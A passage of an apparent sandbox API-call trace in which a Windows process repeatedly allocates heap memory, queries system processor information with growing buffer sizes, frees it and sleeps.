SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.301] Sleep (dwMilliseconds=0x110) [0234.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.314] Sleep (dwMilliseconds=0x110) [0234.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.333] Sleep (dwMilliseconds=0x110) [0234.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.364] Sleep (dwMilliseconds=0x110) [0234.372] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.372] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.373] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.373] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.375] Sleep (dwMilliseconds=0x110) [0234.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.391] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.392] Sleep (dwMilliseconds=0x110) [0234.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.410] Sleep (dwMilliseconds=0x110) [0234.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.440] Sleep (dwMilliseconds=0x110) [0234.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.457] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.458] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.458] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.459] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.460] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.460] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.461] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.461] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.461] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.462] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.465] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.466] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.467] Sleep (dwMilliseconds=0x110) [0234.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.504] Sleep (dwMilliseconds=0x110) [0234.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.520] Sleep (dwMilliseconds=0x110) [0234.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.536] Sleep (dwMilliseconds=0x110) [0234.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.553] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.553] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.554] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.554] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.554] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.555] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.555] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.556] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.556] Sleep (dwMilliseconds=0x110) [0234.559] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.559] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.560] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, 